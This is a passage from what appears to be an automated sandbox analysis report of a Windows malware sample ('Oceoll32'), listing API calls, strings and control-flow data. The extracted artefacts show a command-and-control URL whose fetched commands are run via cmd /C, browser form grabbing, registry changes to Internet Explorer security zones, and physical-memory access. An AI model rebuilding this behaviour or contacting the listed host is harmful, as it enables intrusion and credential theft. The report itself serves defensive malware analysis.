                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE

                            Control-flow Graph (basic blocks with the calls they contain and their successor blocks)

                            • 382: 4068b0-4068c1 → 383
                            • 383: 4068c7-4068e1, call 405f5b → 386, 387
                            • 386: 4068e7-40690f, call 403619 → 390, 391
                            • 387: 406c0c-406c1d, _sleep → 383
                            • 390: 406be1-406bfb, call 4043bf → 394, 395
                            • 391: 406915 → 387
                            • 394: 406c01-406c07, LocalFree → 387
                            • 395: 40691a-406921 → 390, 396
                            • 396: 406927-40692e → 397, 398
                            • 397: 406934-40693b → 398, 399
                            • 398: 406a66-406a7e, call 40143b → 390, 404
                            • 399: 406941-406970, sscanf → 402, 403
                            • 402: 406972-406995, rand → 390, 403
                            • 403: 40699b-4069a2 → 405, 406
                            • 404: 406a84-406aa7, atoi → 390, 407
                            • 405: 4069a4-4069d9, sprintf * 2 → 408
                            • 406: 4069db-406a24, GetWindowsDirectoryA sprintf strcat → 408
                            • 407: 406aad-406aef, sprintf call 407a04 lstrlenA → 411
                            • 408: 406a27-406a61, DeleteFileA sprintf WinExec → 398
                            • 411: 406b17-406b1e → 412, 413
                            • 412: 406b20-406bdc, sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle → 390
                            • 413: 406af1-406aff → 414, 415
                            • 414: 406b11 → 411
                            • 415: 406b01-406b0f → 412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • 1601, xrefs: 004050D4
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • GlobalUserOffline, xrefs: 004050FA
                            • BrowseNewProcess, xrefs: 00405113
                            • yes, xrefs: 0040510E
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            APIs
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
